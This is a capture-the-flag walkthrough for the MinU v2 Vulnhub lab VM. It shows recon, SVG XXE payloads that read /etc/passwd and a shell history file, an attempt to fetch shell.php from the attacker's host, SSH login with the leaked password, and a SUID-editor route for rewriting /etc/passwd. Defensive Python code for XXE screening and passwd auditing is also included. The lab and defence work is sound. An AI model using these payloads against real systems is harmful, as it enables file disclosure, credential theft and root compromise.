Vulnhub: MinU v2 detailed walkthrough
MinU v2
Identifying the target host's IP address
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:10:8b:6f 1 60 PCS Systemtechnik GmbH
192.168.56.246 08:00:27:aa:79:dc 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.246.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.246 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-06 01:52 EDT
Nmap scan report for bogon (192.168.56.246)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 82:33:25:61:27:97:ea:4a:49:f5:76:a3:33:1c:ae:2b (RSA)
| 256 ed:ca:f6:b9:b5:39:32:89:d0:a3:36:94:82:04:4a:e8 (ECDSA)
|_ 256 26:79:15:2e:be:93:02:41:04:c9:ea:e8:05:16:d1:83 (ED25519)
3306/tcp open mysql?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain
| Transfer-Encoding: chunked
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 404 Not Found
| X-Powered-By: Kemal
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <style type="text/css">
| body { text-align:center;font-family:helvetica,arial;font-size:22px;
| color:#888;margin:20px}
| max-width: 579px; width: 100%; }
| {margin:0 auto;width:500px;text-align:left}
| </style>
| </head>
| <body>
| <h2>Kemal doesn't know this way.</h2>
|_ <svg id="svg" version="1.1" width="400" height="400" viewBox="0 0 400 400" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" ><g id="svgg"><path id="path0" d="M262.800 99.200 L 262.800 150.400 265.461 150.400 L 268.121 150.400 267.864 144.300 C 267.722 140.945,267.510 120.110,267.391 98.000 C 267.273 75.890,267.074 55.595,266.948 52.900 L 266.719 48.000 264.760 48.000 L 262.800 48.000 262.800 99.200 M160.800 290.800 C 160.800 291.301,161.224 291.301,162.000
|_sslv2: ERROR: Script execution failed (use -d to debug)
The Nmap results show that the target host has two open ports: 22 (SSH) and 3306. Note that 3306 is not MySQL here: the fingerprint shows an HTTP service (the response carries an X-Powered-By: Kemal header).
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ gobuster dir -u http://192.168.56.246:3306 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.246:3306
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2023/04/06 02:07:42 Starting gobuster in directory enumeration mode
===============================================================
/upload.html (Status: 200) [Size: 908]
Gobuster found /upload.html, which allows file uploads, but only SVG image files are accepted.
Since SVG is XML, the upload is tested for an SVG XXE injection vulnerability, following the technique described here:
https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ vim exploit1.svg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit1.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
Upload exploit1.svg through upload.html.
The upload succeeds and the response echoes back the contents of the referenced file:
in:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
employee:x:1000:1000:Linux User,,,:/home/employee:/bin/ash
</svg>
Upload OK
└─$ cat exploit2.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.ssh/id_rsa" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
This returns an error:
Image.svg:1: parser error : Failure to process entity xxe .w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe; ^ image.svg:1: parser error : Entity 'xxe' not defined .w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe; ^ Upload OK
So there is no SSH private key file. Next, test whether remote file inclusion works, i.e. whether the parser also fetches an external entity over HTTP:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit3.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "http://192.168.56.230:8000/test.txt" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
This time the response is:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "http://192.168.56.230:8000/test.txt">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500px" height="40px" version="1.1">jason,hello
</svg>
Upload OK
The next goal is to get a shell.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ vim exploit4.svg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit4.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "http://192.168.56.230:8000/shell.php" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
But no shell came back.
It seems the remote file inclusion cannot be turned into code execution (the fetched content is only echoed back inside the SVG, as the test.txt response shows), so let's look at the .bash_history file instead:
└─$ cat exploit6.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.bash_history" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
Nothing is returned, but note from the /etc/passwd contents that employee's login shell is /bin/ash, not bash, so the history file to look for is .ash_history:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ vim exploit7.svg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit7.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.ash_history" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
The response:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "file:///home/employee/.ash_history">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500px" height="40px" version="1.1">useradd -D bossdonttrackme -p superultrapass3
exit
</svg>
Upload OK
From this we learn a username and password:
employee: superultrapass3
(-D here is a description, not the username.)
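Every upload above succeeds because the server-side SVG parser honours the DOCTYPE, declares the SYSTEM entity, resolves it (from disk or over HTTP) and echoes the expanded document back. The fix on the application side is to refuse any XML that carries a DOCTYPE, entity declarations or external entity references before it reaches the real parser. The following Python check is an added example written for this write-up; it is not code from the MinU VM or its Kemal application. The function name inspect_svg_upload and the three sample documents are my own constructions, modelled on the exploit SVGs shown above.

```python
import xml.parsers.expat

# Constructed sample inputs for the example (not real uploads).
MALICIOUS_SVG = (
    b'<?xml version="1.0" standalone="yes"?>'
    b'<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>'
    b'<svg xmlns="http://www.w3.org/2000/svg" width="500px" height="40px">&xxe;</svg>'
)
CLEAN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
    b'<rect width="10" height="10"/></svg>'
)
NOT_SVG = b"<html><body>not an image</body></html>"


def inspect_svg_upload(data: bytes) -> dict:
    """Pre-screen an uploaded SVG with expat callbacks.

    Returns {"accepted": bool, "findings": [str, ...]}.  Any DOCTYPE,
    entity declaration, external entity reference, non-svg root element
    or well-formedness error is a finding, and one finding rejects the file.
    Nothing is ever fetched: the external-entity handler only records the
    reference and tells expat to carry on with empty content.
    """
    findings = []
    root_name = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE declaration present (name={name!r})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "external" if (sysid or pubid) else "internal"
        findings.append(f"{kind} entity declared: {name!r} -> {sysid or value!r}")

    def on_external_ref(context, base, sysid, pubid):
        findings.append(f"external entity reference to {sysid!r} (not fetched)")
        return 1  # non-zero: continue parsing without resolving the entity

    def on_start_element(name, attrs):
        if not root_name:
            root_name.append(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"malformed XML: {exc}")

    if root_name and root_name[0] != "svg":
        findings.append(f"root element is {root_name[0]!r}, not 'svg'")
    elif not root_name and not findings:
        findings.append("no root element found")

    return {"accepted": not findings, "findings": findings}


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("clean", CLEAN_SVG), ("html", NOT_SVG)):
        result = inspect_svg_upload(doc)
        print(label, "accepted" if result["accepted"] else "rejected", result["findings"])
```

Running the block rejects the first document on three counts (DOCTYPE, external entity declaration, external entity reference), rejects the HTML document because its root is not svg, and accepts the plain SVG. The point of screening with expat callbacks rather than a regex is that the same hooks catch parameter entities and entities declared in an external subset, which a simple search for the string "DOCTYPE" would miss once an attacker varies the casing or spacing.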
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ ssh employee@192.168.56.246
employee@192.168.56.246's password:
_ ____
/\/\ (_)_ __ /\ /\__ _|___ \
/ \| | '_ \/ / \ \ \ / / __) |
/ /\/\ \ | | | \ \_/ /\ V / / __/
\/ \/_|_| |_|\___/ \_/ |_____|
minuv2:~$ id
uid=1000(employee) gid=1000(employee) groups=1000(employee)
minuv2:~$ sudo -l
-ash: sudo: not found
minuv2:~$ ls -alh
total 14M
drwxr-sr-x 4 employee employee 1.0K Apr 6 06:15 .
drwxr-xr-x 3 root root 1.0K Jul 16 2019 ..
-rw------- 1 employee employee 72 Apr 6 06:34 .ash_history
drwxr-sr-x 3 root employee 1.0K Jul 16 2019 .config
-rw-r--r-- 1 employee employee 253 Apr 6 06:31 image.svg
-rwxr-xr-x 1 employee employee 14.3M Jul 16 2019 main-static
-rw-r--r-- 1 employee employee 169 Jul 16 2019 main.pl
-rw-r--r-- 1 employee employee 302 Apr 6 06:31 perl.out
drwxr-sr-x 2 employee employee 1.0K Jul 16 2019 public
Privilege escalation
minuv2:~$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
└─$ sudo openssl passwd -salt jason -1 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61
Note that /etc/passwd cannot be opened directly with micro; instead, cat the file and pipe it into the micro tool:
minuv2:~$ cat /etc/passwd | /usr/bin/micro
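The SUID copy of micro lets the employee user rewrite /etc/passwd, and the openssl passwd step above produces an md5crypt hash that fits the password field of such an entry. A host-side integrity check that catches exactly this kind of edit is a useful complement to removing the SUID bit. The Python audit below is an added example, not part of the original write-up or the VM; the function name audit_passwd is my own, and SAMPLE_PASSWD is a constructed file modelled on the write-up's /etc/passwd output with two injected lines (the hash value is a placeholder, not a real credential).

```python
# Constructed sample: a few genuine-looking entries plus two injected lines
# of the kind a writable /etc/passwd ends up with.  PLACEHOLDERHASH is not
# a real md5crypt digest.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
employee:x:1000:1000:Linux User,,,:/home/employee:/bin/ash
backdoor:$1$salt$PLACEHOLDERHASH:0:0:root:/root:/bin/sh
employee:x:1001:1001::/home/employee2:/bin/sh
"""

# Password-field values that mean "locked" or "look in /etc/shadow".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> list:
    """Return a list of human-readable alerts for suspicious passwd entries.

    Checks performed per line:
      * exactly seven colon-separated fields (anything else is malformed)
      * password field is shadowed/locked, not empty and not an inline hash
      * UID 0 belongs only to 'root'
      * user names are unique
    """
    alerts = []
    first_seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            alerts.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid, gid, gecos, home, shell = fields

        if pw == "":
            alerts.append(f"line {lineno}: {name!r} has an empty password field")
        elif pw not in SHADOWED_OR_LOCKED:
            alerts.append(f"line {lineno}: {name!r} carries a password hash in /etc/passwd")

        if not uid.isdigit():
            alerts.append(f"line {lineno}: {name!r} has a non-numeric UID {uid!r}")
        elif uid == "0" and name != "root":
            alerts.append(f"line {lineno}: {name!r} has UID 0")

        if name in first_seen:
            alerts.append(f"line {lineno}: duplicate user name {name!r} (first on line {first_seen[name]})")
        else:
            first_seen[name] = lineno
    return alerts


if __name__ == "__main__":
    for alert in audit_passwd(SAMPLE_PASSWD):
        print(alert)
```

On the constructed sample this reports three alerts: the backdoor entry for its inline hash and for its UID 0, and the second employee line as a duplicate name. In practice the same function would be run against the live /etc/passwd from a cron job or a configuration-management check, alongside a periodic listing of SUID binaries like the find command shown above, so that a SUID editor never stays unnoticed.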
STRIVE FOR PROGRESS,NOT FOR PERFECTION